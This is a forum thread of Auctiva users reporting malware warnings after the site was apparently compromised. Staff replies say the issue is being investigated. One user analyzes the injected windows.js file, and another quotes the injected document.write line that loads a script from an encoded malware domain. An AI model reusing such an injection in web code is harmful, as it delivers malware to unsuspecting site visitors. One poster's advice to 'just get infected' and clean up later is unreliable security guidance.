attention! urgent! virus on auctiva.com; Trojan-Clicker.HTML.IFrame.kr

Yea my AntiVir is saying Malware detected.

Whats up Auctiva


**couple hours later (11:16 AM)**
now it says Virus, and nothing about Malware. I have no idea whats going on.

I'm not an expert, but those URLs do not look like Auctiva ones...they end in .js? All of Auctiva's URLs end in .aspx. If there was really a virus on the auctiva site (which I would think is highly unlikely), I'm sure there would be 1,000s of people on here complaining about it.

Thats what I thought looking at his links but my AntiVir does say Malware ALERT and advises not to continue in Internet Explorer.

On Google Chrome its the same thing ONLY the Google Chrome browser finds it and warns me.

I get warnings when I

when I logged in
save a listing
put a picture on a listing
change the folder to a different picture folder
click the picture in a listing preview
Click edit to edit picture
to crop a picture
the save after the crop
choose a category

and bunch of other times, I just choose not to bore you anymore

A message from Google Chrome when i try to make a listing.

"Warning: Visiting this site may harm your computer!
The website at www.auctiva.com contains elements from the site me9x.cn, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for me9x.cn.
Learn more about how to protect yourself from harmful software online."

It's a bunch of chinese sites links on the site. you can even see a tiny square just on top of the auctiva in some pages. Looks to me security has been compromised and someone embedding scripts into the site. It's rather irritating with my browser crashing a few times because of it.

I was just going to post something about the Pulsing "A" in the upper left! But you beat me to it.

Hmmmm...

I'm getting an odd notice to load an ActiveX Control from the main page ( snapview.ocx ). That one does have malware possibilities. It's not on every visit (I'm declining until I understand the situation), so it may not be on all the servers.

The .js lib is their javascripts.

Has anyone reported the problem?

Danno

Hi all, just read your messages and also experincing same problem. attempt to gain access into listings when the page crash followed by a warning that my anti virus has detected a virus....ca anyone advise please?

quote:

Originally posted by Danno:
Has anyone reported the problem?

I haven't, not sure how though!

Experiencing many of the same problems. One problem I have encountered, which I haven't seen anyone one else describe, is when opening the listings page. Windows installer tries to install something related to "Microsoft Office 2000 SR-1 Professional."

avg is also showing alert on this:
http://safeweb.norton.com/repo...ow?name=luckffxi.com

It's not appearing on all the pages, only on e.g. saved listings page

Now everywhere I go in the site I am getting warning from AntiVir.

I have 2 pulsing "A"s by the auctiva logo now!

I have to log off and scan my computer now! I'll check back later

Wanted to sign up for Auctiva for our new Ebay store when, lo and behold, Chrome pops up a security warning. I dug into this and found some very interesting stuff.

It looks like Auctiva has a security hole someone is actively driving their truck through it. The problem is in http://www.auctiva.com/js/windows.js
If you point your browser there (it's safe, it will read as text) and scroll down the bottom you should see a document.write statement. If you don't see it wait a few minutes and refresh. It looks like someone is trying to fix the file but something else is putting the attack back in which is why it might not be there when you look.

See how the URL looks like gibberish? It's ASCII code for me9x.cn, a Chinese site blacklisted by Google. The code in question writes a GIF file into the page. This is why you're getting it blocked in browsers like Firefox or Chrome, which pull the Google blacklist and enforce it. If your antivirus picked it up, good for you. The GIF file is likely reading your cookies (or worse if you're using IE). Whatever the case, that file is up to no good and if you can see this image Gortusk describes you may already have problems on your computer that you can't see.

I would highly suggest the following
1. Do not log into auctiva.com for now. The forums are clean (they appear to be on a different server) but the main site is clearly compromised.
2. Switch to Firefox or Google Chrome as your browser. Both browsers blocked the attack.
3. Run some anti-malware software, especially if your antivirus didn't catch this attack (not all antivirus has anti-malware). A good place to start is Adaware (http://www.lavasoftusa.com). There are many others out there as well (AVG seems to be catching this already).

Here's hoping for a quick fix. Was hoping to add some tools to my store today.

ooh..
document.write('<script src=http://%6D%65%39%78%2E%63%6E/new.gif></script>');

chinese bad boy ruining our day(or night)..

I agree with Highland. One of my two computers appears to have been compromised.

Danno

I NEVER get viruses, yet as of this a.m I've spent my entire day trying to figure out why I had one when I booted up this a.m. (Auctiva was the last site visited yesterday). I have a big red warning from Norton (this pop-up window won't go away!) it says:

HIGH RISK

trojan.malscript!html

So now I can't work - now what? Is every Auctiva user infected? HOW did this happen?

Hi all,

I have AVG 7.5 internet security and every time I try and do something in auctiva it throws me out. Can't even email auctiva to notify them!!

Anyone had a response from them regarding how long it's going to be before we can use auctiva gain?

quote:

Originally posted by womandi:
I NEVER get viruses, yet as of this a.m I've spent my entire day trying to figure out why I had one when I booted up this a.m. (Auctiva was the last site visited yesterday). I have a big red warning from Norton (this pop-up window won't go away!) it says:

HIGH RISK

trojan.malscript!html

So now I can't work - now what? Is every Auctiva user infected? HOW did this happen?

calm down, I'm pretty sure a lot others have been infected also. I'm using maxthon which tags on to IE's engine. I still can login, get a bunch of alerts and Auctiva is still functioning as it is.

What I suggest, is if you need to do something urgent, just get infected like me and finish up what need to be done on auctiva, close your browser clear your cache and temp files, run a full antivirus AND antispyware scan(spybot, windows defender,etc) and clean up the system.

If not, check for update here until an admin pops up telling us the problem have been fix. I'm sure the support team is fully aware of the situation and working on it asap.

Hi Community,

Thanks for helping to bring this issue to our attention. We are receiving reports of this nature from several customers and our engineering team is currently looking into why these warnings have started coming up. I'm not sure what is causing this at the moment, but I'll post again to this thread as soon as additional information becomes available.

-Mike

Hi Community,

Update - I will actually be updating the following thread in the "News" section of our community forum when additional information on this topic becomes available: https://community.auctiva.com/e...&r=25410931#25410931. Please check there for updates on this issue.

-Mike

Yeah there is a small little A at the top of the page that links to a chineese site. My pc is all bogged down since login into auctiva.

Google Chrome (and FireFox) are warning you about the problem before you enter, but you can still catch the virus useing them. SO until someone from Auctiva says its safe to go on the main site I will be checking here.

anyone know if we need to be worried about our auctiva commerce stores?

I am also getting this virus threat message. I note that Auctiva are aware of that problem and trying to fix it.
I also listed 5 new items yesterday afternoon but although they said they were being posted, none of them made it through to EBay. They are sitting in my saved listings. I tried to post one of them again and got the same response.
Has anyone else had this problem or know whether it is associated with the virus threat?
Susan

I am on a MAC using Firefox. Site is very very slow! It is taking a long time to load Auctiva and each page I want to visit takes a long time to load too.

Therein lies one of the biggest reasons I rarely use IE.

I used it a few weeks ago on an older computer that has a regularly updated Symantec AV program and it still has a Trojan which Symantec kindly isolates daily.

Here are the updates for the virus problem and speed issues.
https://community.auctiva.com/e...081020411/m/25410931

Same here - viruses getting detected EN MASS when I use Internet Explorer. Mozilla Firefox is OK, however, it only gives me the "newer version" option of uploading pictures, and then my computer locks up.

O NO! I have it Now(

I haven't being infected... maybe because I haven't log in my auctiva account. I have only visited the forums several times today.



http://thetimewatch.auctivacommerce.com/

Ditto. McAfee says there's a virus in my c/windows/gameeeeee file. McAfee warns me of this location every page on Auctiva - both my firefox and explorer. Told HELP but was told it was my settings. When I say to McAfee to delete the virus it pops up again on the next page I open in Auctiva. Rebooting doesn't matter. The one listing I made to eBay today showed up there totally cockeyed. Took me 35 minutes to straighten it out on ebay. This is devestating.

I am on a MAC. I am getting the google warning whenever I try to log onto Auctiva today. Even when I tried accessing this group, Google was blocking it! I switched to AOL and got through to post this.
A few of my customers paid last night and this morning. Multiple auctions that were combined and paid are now showing as uncombined and not marked paid on eBay.
Everyone should check Paypal for what is paid since last night.

All browsers are sending up a warning. The problem is far from fixed.

Do you mean this trouble has extended to eBay as well???

I cna't even get in with Firefox today. I had to switch to IE but when I ask why it is blocked in Firefox, it reports their tests all come up negative on virus but the site has been reported as harboring malware or virus. THIS NEEDS TO BE FIXED NOW!!!!!!!!!!!!

When a customer clicks on a picture link it will take them to the page that states it is a reported attack site. Big red box, very intimidating like I am trying to attack their computer myself.

Thanks Auctiva for scaring away any of the few customers left on eBay.

Having the site down and slow is one thing since it is free but actually having this problem is just ridiculous and beyond any normal decency. You are directly affecting my ability to make a living. But hey it's free right?

Ok, so now whenever anyone is clicking on my pics in the auction... they get this "Warning" message. Real good for business here.

Looking at the Update Link... there are no updates since yesterday? What's going on??